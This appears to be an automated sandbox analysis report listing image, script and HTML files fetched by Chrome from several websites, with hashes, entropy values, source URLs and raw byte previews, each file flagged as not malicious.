                                              SHA-512:E4AFCCC68BB084B708027C0E83B3E64E635950FF989CE085E0D4FED8CC3370F2FA993785A48703815070980CE15AADBF8DCEA532B4ADFD9FC542E16EA7637C08
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):53884
                                              Entropy (8bit):7.9962239420642325
                                              Encrypted:true
                                              SSDEEP:768:298mD1MGEKugZVz26MQZhEblmkPc0elErloqwU9Ez+/K80slTKF2UkZKnDXvyy2c:48mD1MYlvemkE3yPh/32sk2AcGP0I
                                              MD5:995BA9BC493346488539C1089EC9CB46
                                              SHA1:1A39A0B3F5C0B904428332D77E285866734857CF
                                              SHA-256:3BF0981939D17C0CB098ED5450961A84731F5D61FBF7F4E1520A4483E18B7C3C
                                              SHA-512:1A902B65C90998AFC43692780BE37117D3C76D6B626860BE605B620F23EADB294F2E0B7E8F4D2E853F17FF6496424B2F65FA135B52A90C8D137CEB7007775FEB
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFFt...WEBPVP8X..............VP8 .....5...*....>.p.S.&/0..Y....ens.[............M.Gz....^......._..`.....S...1..........<.....v..h....k~.._.....z....c/.{........z.............K._........z........K.G._./.....?....~.,.........;.....6...?...............o..n..|....OA...{ze~ot.....;...&~................a_.....?j.....C........Z.....u]h<.Q(.j.....3..........i..V...^...F".[lQ..i.C....<...o..4.`..l.S..*<b..l2...ua.......-./.$IE..dZ..>0.p.E..=t..T...)^...3..+|.pv!m...EM..8@.j..p...6f.-....~..2IC.....y....x|k.w.(...v.P.L.%tb.\...Los.4..KIR.T]e.}j(0G-.1RQ..-.p..)o.{..rQo.)E.W..b.Z..E..}@...{y....s....[....v.|.p.....r.k^..7.....J4[.U@......Y[k n..B..$0%'n.J>k}.I........?..{.......V.=.._.r.N.%x.w.~..}...F.P.bm@..F..OA..W..Ta...ct......V...C7...B.....)'....C.fW.M-. .yQ..(......S.........b@..z..g..R"."q.'.F.......Y.K~}J.%i.R.o.9f.....&./.)>jG.r..z.!..!.?.........;.1.<.M.....(.....(iB.}z..=n.3.|[.......V.....Jn..(....X..(...0...r..P....t....[?...ua+#..!..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:downloaded
                                              Size (bytes):44001
                                              Entropy (8bit):7.9672965048432625
                                              Encrypted:false
                                              SSDEEP:768:/V6623otdd3xZvL/2JjLkncRp/6qVm+peZ4XR1pRPKpxj2o7QT5wpKRmqN:yEZx2JjLYeAqI+pV3Ud23wpKRmS
                                              MD5:70AD24675BC319EEABCF1AE32556A6AE
                                              SHA1:06033CD04398FDF22BFF86A5D9C5B1CD04994FB7
                                              SHA-256:6880E52706B234FC924CF26F1104110F26857AA07398197296D4F178C2D885AA
                                              SHA-512:2ACC212863B74DEBD19E780636943753212BBCB591CE3D6194DF2E35C4E849F3D90506909E8912D6386940FE554033BA22F1A73D7CFDBAF795A4DA56806C9565
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/news/7/37084e21a1e397964e863e3221dbb8f2.jpg
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm..............".................................................y.)K..d.EE4.S.B...a.F....(.5.%.....A.$(..E B..H.E....*(...e..JS.9)E.j3.+.u(...a.F..1.b.!..b..J..1.B.I!$!... "....RHB>.e..r...V.'da\!\Q..q.!.F1.P.Q.H.!F(....1I .i...!.@....$$..s..r..9..cD...\"EB1.k.c..F1QQQJ( .PIF.F1.D..... B.4.Q.BI..,..)69.C....!...c.F...D(.*.D....b.....(.E!..M ....Dk.N.A..977 .&...Q.......`.A..c.).....)B.$...AE$.".m.)I...$.4/.JR$...H.I(.c....(F...!..H..RQQQIF"QQ..........(.H...IM.`.I....J0I(...#....b.!8.%...IDIE "..i.@...$."...NM.56...`.(....c....bQJ1......I$...HI..B@..$.Q.$..6..c..l....b.....R.!(. ..H..$.H"..."....iD..(@.>.!.C%1.`1 @....((.......J1QDH.$$%..I..........A...Hm."Rm....!E(.(E!D.....J1"..(D@.QQ....P..D.(..._A.M.r$........I%..@...$....I$..QJ).i.... .@...K...0m....44.QI..P.."1....I$..RJ$F.Qi......H@.^......9.....!!(...bE!$...$.CDH.(.&
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (568)
                                              Category:downloaded
                                              Size (bytes):2441635
                                              Entropy (8bit):5.606117513640613
                                              Encrypted:false
                                              SSDEEP:24576:1E4S8aGQ+5ULgOVJ4uIsZ9ouA1mXb0Do1QAKQ:i4S8a+5eVJNIsZ9Q1mXD
                                              MD5:62727FA83183431062CD87C2ED9D26EC
                                              SHA1:FEDD174111222776D78DE97EE624FCD19D170200
                                              SHA-256:6331E4536BB13101EB1A3546B8395BE20933FD13F4116855B96C15680B1316BA
                                              SHA-512:6ED7F2B847D7C1BD6859DBF7EF7814C0AE4D8A62719526AEA15AE57DD24262AC4B2324F84DE6E3A4D3AA9EEA92DE4A786E462FBFC95FA0FF83C5FAAE4A746D43
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.youtube.com/s/player/26636eff/player_ias.vflset/en_US/base.js
                                              Preview:var _yt_player={};(function(g){var window=this;/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC All Rights Reserved... Use of this source code is governed by an MIT-style license that can be. found in the LICENSE file at https://angular.dev/license.*/./*.. (The MIT License).. Copyright (C) 2014 by Vitaly Puzrin.. Permission is hereby granted, free of charge, to any person obtaining a copy. of this software and associated documentation files (the "Software"), to deal. in the Software without restriction, including without limitation the rights. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. copies of the Software, and to permit persons to whom the Software is. furnished to do so, subject to the following conditions:.. The above copyright notice and this permission notice shall be included in. all copies or substantial portions of the
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (323)
                                              Category:downloaded
                                              Size (bytes):130082
                                              Entropy (8bit):4.240344787493805
                                              Encrypted:false
                                              SSDEEP:1536:5igqRxrbwE5Xapg6f7yZYFJ7IZEz5uYvbQ+lk:5iggrbqryZYFJ7IZEz5uYvbQwk
                                              MD5:6E57AC6EA102746FD27BEBF022C59898
                                              SHA1:C65C1E41AADAE8D9851310AE901D315046790E11
                                              SHA-256:A12F79771D93B1E170EA961B61348E5AA6320C1DFDE0747BDD9677A240AA4FC8
                                              SHA-512:911320CB16E1873C6F650B395092D2D013C90C8FE07F8330852DF4B877F2BAEC16AA5C9D1D56CF255ECC3F903D128E045749955CD74658F1F90B3F8E40BDBFB2
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/
                                              Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta name="viewport" content="width=device-width,initial-scale=1.0">.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta name="robots" content="index, follow">...<title>Web Development & Digital Marketing Company in Dubai, UAE</title>.. <meta name="keywords" content="">-->..<meta name="description" content="Tomsher is a premium IT web solutions company based in Dubai, specializing in website development and digital marketing services in UAE, KSA, Africa, Qatar, Oman, and other GCC Countries.">. <meta name="author" content="Tomsher Technologies">. <link rel="canonical" href="https://www.tomsher.com/ ">..<meta property="og:title" content="Web Development & Digital Marketing Company in Dubai, UAE" >..<meta property="og:description" content="Tomsher is a premium IT web solutions company based in Dubai, specializing in website development and digital marketing services in UAE, KSA, Africa, Qatar, Oman, and other GCC Cou
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1000x800, components 3
                                              Category:downloaded
                                              Size (bytes):85004
                                              Entropy (8bit):7.978936142850846
                                              Encrypted:false
                                              SSDEEP:1536:6T2/tWbN/MutnXPRu6SkLeYiGSsn0V117mKzzH/JoZCzvUI:LWZUu7u6SkKjR7mKPqYLUI
                                              MD5:5C1DF59C53CBA303FBC334EDAE550B85
                                              SHA1:66599E939F4FCB5C439540B62A4E217899C9D9AB
                                              SHA-256:DE145B9451BAD0A05699270211FB25D1E3BAF25A754F27053570E81D9B7DDE39
                                              SHA-512:62DB87D1C3FB201639045D90F006E5F05B2317EA734ABEC0E6EDDFCCE6107D986BA8E48319F7CD6D25797A90B7C3F13EA307D685D43C24D664B0AAD77CA44571
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/services/3/cfea3c00d03e25b1000c418caee5bc94.jpg
                                              Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:DD587B73934111ED9088BC1E9C9B17A2" xmpMM:DocumentID="xmp.did:DD587B74934111ED9088BC1E9C9B17A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DD587B71934111ED9088BC1E9C9B17A2" stRef:documentID="xmp.did:DD587B72934111ED9088BC1E9C9B17A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d..............1...z]..L...........................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):16161
                                              Entropy (8bit):7.981196196538167
                                              Encrypted:false
                                              SSDEEP:384:K0w3ekqxqlNCK/JYtUekr+GpVxbndg/9Zdhv/g:KR8q7PBYtUzr3pVddgrbvo
                                              MD5:B69B2CD6039A8C7B349717C504335D96
                                              SHA1:B36AC183696875AA6E1F3239A1300D28ECD468B5
                                              SHA-256:7821E94C51EB2A4EBB5AAB5D4F1DDC9D5E8481169DCD3617F6FDA24B99ADF363
                                              SHA-512:464F69DFEBBB546DA2F2FF96ED7A57F820AA026A22C9932E07AE826DD95C2E888CA9ABE6E92AF6FB4B3922190BB855386C2F6E4CE91C514688ACFE0E33498AAF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/19.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):56552
                                              Entropy (8bit):7.996002286598437
                                              Encrypted:true
                                              SSDEEP:1536:IB4xRE4PHa8ifoyEcwuLvoYB5MxnxTrNq8HUMuSN:9Y4moyEFaoYB5MbTrAqX
                                              MD5:2FB7C41470073929B74E98C05F1CFE20
                                              SHA1:7B9EAA3B33469CA00C72B65104BDD9EEEFBFAA0D
                                              SHA-256:ECB8E5D6ED1139E843FF9ABFF341EFC418264CD98DAD2A68310DBE18E893BB88
                                              SHA-512:D121C38976BDDC7C4441F133B256A9A745FC5E3E5D9F1CC8DB8E8940E808CB19C30FB83798E359BF398BE5DEA8D38D59F0B8CF5A0FE752E38F077277F0D000D0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/19/f8a20d10a257c0d0108fbe993c55b0fa.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 l........*....>.n.S)&..#.J...gn........F.L8.......;..Y.._...z.<......C...u9.....jy....!o0.>....}!.H.............o..]._......=..b....4..~../...~H.s...../q.j..........I...._a.f...9...>..U.....o...<..;.'.s./.7..xu ..C|.a?"XOQ.Xp..Tf.j....yt..;.........2.@..........l...LEi...1C.XO.o..u)...`%...S.t...e.....)#..S,.....O..[.LS.....N|R[..o....._.b..p.E......V..?U.3.u6.L.E.Y.>H.N;.W .n......{...A.b..q_.b.Jb..T.m.AI$g-^+.$..0G.C;h6;r..../\%.|R..lkU.N...A.[dj..XQ..\W.X.9..../W#.n..O....>..n....\.mK..2....Ye....b..R..I...h....#.~@....:|)...n..BZ.L."~D.&&|...qVsh?">...U.Fr.o..b..qZe...S..[..8.9..E..5f..Q...Q.H..+.+r.i..4.ON|.[...A.b...[.b..p.&.!n..A..V..W.....E)......g/.>#..s[Jbg.$.\.._.R>.s.a...b..X..\g.q....^..p....\...'I..Y;....Q.6<.Kl.......0f+...Z....0....[;&...lV@oe.c.^.W......p .\..............E.2..]$kU....E.uk...6\*...t.@7..T_@............e...Jt.o...|.N....m...../hj.L3......iZ|(.e......*&#\.k..A......m..i.....{..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):18346
                                              Entropy (8bit):7.9841770820037485
                                              Encrypted:false
                                              SSDEEP:384:ogn0QmouLgTckC3YQNzqOE6eDMDKOtV/IkpzaaGxXwL:l01o1TckizqhKDPtl5pzadxW
                                              MD5:4F08CC6A77E30C1868DBE1758CEB7121
                                              SHA1:CCABC3B9B290167CED5CD6931465FF0F8B83AD00
                                              SHA-256:9E5B7AF5C744477E0889AE7C4B0D48DE6B4232C74D0F5ACBB6B6F692A0707558
                                              SHA-512:2BD073B10D3EDE93FE1C1AA6F7ED314D315B048477BA70EF3CEA8BB925F43FE2292145E19ABCF6FFC624AC28EAC2BF8537F703DD576A6144BC152097BEEF988F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21412!3i14014!4i256!2m3!1e0!2sm!3i707457593!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=77070
                                              Preview:RIFF.G..WEBPVP8L.G../..?.'.8.mUy.}..C.....,{..o..4.G..*.....<.2%...[.V...m[U.|.8.%..0.P..h....g...2.R .R .nA...1..)a..". $.d...!9dG$@#d.`...F...10I...n.7......%M.2V..<."N...$QQ8HU.&I.R..0V........!$@...M.....Q..._P.H...}8Y )....[\..+.R.Rj.x...&.&nE.u.lG.:..q.K3R.$.(}.....<)yQ.$..6...-WF.._...|5.AuMV.A.ba.E-.X..B4..........y. :@.&.....*.-.~...~.o.....R.R.. ...U..+Z?..@.L.v..9d..2hE...ds..v].../._aY.\...D....8...v..V~...Ox...e..)....$.........n.v.B.P............:.l.v.$9..,^...@......\|.>../..n1.W}....h.J.JW.6.^y.( ......5.r|keu.(S .j...M.."#A...6...........G...N ).H.Z:._~..l._.~.@ .........).......}....1O0.dR)S/..$..F.`v...2G....Xw..f........t.......E./..........=;..+..k.#..Q/.1.q'k...3..36d#..#Y.......w......q....._.C`...}.........}.*T..a..";nv.......`p*...#..8c.\..n]..3%....G\<.......|<...4<c.....O.x..^`y..N...8AD.E...*."Ty..+..~....../.~..Ki.@..0?..'x...;.A:$-...+;..h....@.).wy.I..2..n...*B..PFx.w[....@...O.rH..K.....O...p.r.......j@.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16542
                                              Entropy (8bit):7.7362615097742475
                                              Encrypted:false
                                              SSDEEP:384:4YNg7K20Jqp/cadcjQrN6fp5dwWZZ77VhzkJCI:4Yy0Js+jQsJwWZZXVZ0d
                                              MD5:9E5A06A51471D83F69C600D631C569DA
                                              SHA1:0C36EAE5DB2F22C9B9B976A3DB38373A7833A7BA
                                              SHA-256:9EE64BCB4FDBE5C6A2937BEDD30967BD42C2A906B35179850CC213EA7B21FD76
                                              SHA-512:2B56DFDDBE9EEAC8137D9127333E22DC29AF4AD41F1D6DDD90C57D1625FFBCD1633C9A888E227A160888F821E5A0D2955D98DEF3E63ACE8BA37F1F37103E79DE
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/45/20d25e59e8c8667226b26d0bd9c4d9a1.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):4618
                                              Entropy (8bit):7.951391150470394
                                              Encrypted:false
                                              SSDEEP:96:NQZqXB59Wb6feyrqbrvMk3RfBNh+sVaCOpnDRo342i7RLcSfXy0W:NXfEY2rkkhf4hte342iZHfC0W
                                              MD5:177F4FDD95C894DB0ECC771AEF1CD19C
                                              SHA1:255DE4F9A8F3FDA48A7DD6EA30D0610C4C333A50
                                              SHA-256:DF45A9C1B96A0CC3FB201F3E950CBFE8B80CB53C797EBF3A6FD6A4B07490476C
                                              SHA-512:BFCBB9DEF1B3597A19ED90F18E73773A2D71C2FE6A1D4CF856825010A03E5F5B91AC2305CAF69502C5AE64B12FFD8BB28571DA69B027E5BE20C84C9D74C01557
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/students.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...v..XUr]Zw...[Wu......A?W...==T...;9XXZv...CA[VXr.....??\TSo?<Y<9O...w.....67T..EE`..t..CA_y..83J8?XJFb12H........UW|..........7>_.u.QPlQVv.........n..-,>...SMh^]rKIf.6<N.|.F7N.............7Df-:Y...}..v..+2P..[_{r..QYkw.......^IV\Vf......................ACS......uq..t..d...c]}QPb...........K@V...[Tneu..o..l..lhx.|....@Bg.........s........}...L]yQ\.l~.................w....?Ku.._p.....g.......gXm....V}.d.u.......qR\.}........yWq..Uh.....cq.......n..i...bf................iy....3Y.Eh..`.........t.....IDATh...S.Y.....4].Mu....^#,.P`...Z.).H...........M2..h..%&.d.d2[I.n../..q.....U~...9....a._.P3,!.....e.0.]U..a2|.B...:...(.N...!.*.....B .....M6k.*..Rt.l2.X...dbe.aW..CS.k6........~...B.F..CQ...DX..%I.K........:5.%/V......3Bl.....s\Yga.,[..M.4A.....4Z.!.......8........E....!.-dr.ha ..h..HR.W!..!....C...i..G...%.7.q..y..@.nN..M.+..@.......iQ$./.....[!.....-...#H.`:.VD.E.8.'......p^.Y.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 4-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2437
                                              Entropy (8bit):7.907744844554134
                                              Encrypted:false
                                              SSDEEP:48:usigXCUVww9c5MLHVDZMrVeYZfAbEQthUefYwhHTMhKgQOGgGnc:us0/w9ce9ZCVHAdEM1HT5JOWc
                                              MD5:99F9D1CC4336E126C11D645BA350068F
                                              SHA1:401D67990378C1F42DD4209DFE37F20FB2A87B84
                                              SHA-256:FB0FB61B6C10000393188BCF6F10A8E54A98F550A431127E10EDC270A26EEC95
                                              SHA-512:233E21A14FAA6AC86CDF44A2AD3D96DC064FECEED4263F9957BF2EEBD47C01CF57478A06666547B5DC4AC545C88FD6F2DD235A7261733A9FFFFB9F73B137B593
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.......g...0PLTE.....................BBB)))...vvv..........___v.......IDATX..Xm....>\^f..+..%....+...e~...e.J........E..b.%M...%.5a..vc..u1.....biC..").nWMZJ.f..?.VLiP.>..vuuv...?..;3.y..s.s.;.....o._6..L.pl.c...&.....=k...-e.../7....C.vU.t.U.#..x....\...h.?'Y..k?z.../.X...wm`....HYU8..%L..wm.*.$.7U....[K...M.&...J,(...1A...Q.V.}#.d@....9...../.........b....T.~.<.Z...i?....VZ.......k....6..<.l.v..r......l.L\..........c.[..1..ee.}..?#..r.....q%.oc.~d........,.....0.{....d....W.J.8....dP....h.s;.da.a`.~.z....2....@...f42...M..o.......n...D.."...20...6.<=f4..$....zmP6S.O..!...PxQ.....B......C....V..6..jv.L(....c.......9.....d}.R.5e....=..`.ma.s.......2..%*-M.w..n.-K...3...4.|.).:+.Q..+/...E....J..&u..&q...p......7.. ..$.5v..BaV#..iuS..%..(G>6 .I.....(...Dc.8..Qs........QG..8..p?.@..]o..(u.....Z....Z..GP.A<.T.*.0.[....dl.q..I..i.$....F.5.b....bnCHsrB0....d.9.l....+2...(.W%0........LT..N..6Mi.$G..qa...`..h..2A......(.5..D.e
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 253 x 87, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):19094
                                              Entropy (8bit):7.944191431559707
                                              Encrypted:false
                                              SSDEEP:384:0JXE05ssozf3U/0R7lyGLJKnXyWiRlHLhjhr56G/2GYGItgUyc:w35ssoTk/0R7CF2jJrYGIt7b
                                              MD5:957B517E9EBBCE44D0AB91371883E1DB
                                              SHA1:0CD84A7351FFF71F45AE70876D076BD628C0DF75
                                              SHA-256:164244DA85648DF62F6E4DE4D73BC54A8427C4F63F65F4F7754B58AF8F5E19F1
                                              SHA-512:8FC8C22F0A6148C7D73421C47413ED1F8190E2E9334AA11EF191A8526E9B43039B3A07858C43934F60B403A25A97FD850471CF2990C7815BD5E34DD7C800CDAE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......W......Ct....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16845
                                              Entropy (8bit):7.7395172000708
                                              Encrypted:false
                                              SSDEEP:384:4YNg7iCheCXzgqpv18EjVzEEh0V6rSj4IdfEHMbWtMl:4YyjeqZeIdhW6rQVqMRl
                                              MD5:8D5486739B79031EBFF51E6F7904E566
                                              SHA1:B3E60D959BBF983B427709258E62C9FE1717FDFD
                                              SHA-256:BC957A25E11B36C7623C5BB08B0C84A7AE033A7ECC9491F595B32225850A4A5D
                                              SHA-512:B0EF881F1C697111FF20ECC00125E1B3C22663C117AA96B2636A3CB0399EBBD6797FE637A691EA3A0F3A55FA49E1A5225026F204B074DF162CEC14F942BBF1E7
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/31/707eac7627727f1d32ffd41fb4f47eee.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3292
                                              Entropy (8bit):7.924046214449455
                                              Encrypted:false
                                              SSDEEP:96:7snyqJuB95v0LSJ/KuD4GrXH2tXr2YM8WyvfhdqYbnY:7sny9TMm/LrS72f8PXhQYbnY
                                              MD5:098DE4EA903F025977AF94A898CDB243
                                              SHA1:89E3E03E97FDBBF7D4E1F09718714577AE374087
                                              SHA-256:C51331E69F6D481D3FD3162237376A56E4A1C130E0805834E36C584A8DC8CD4A
                                              SHA-512:F22CC7D6F54F134E4A90D58E42ABAD7C0E134B96180DF8828E4B13EBBC2E9812DD3B1ED133303DC60E90BB3B234BC774CEC49213DDBDAE92D9011A0FA0B899C1
                                              Malicious:false
                                              Reputation:low
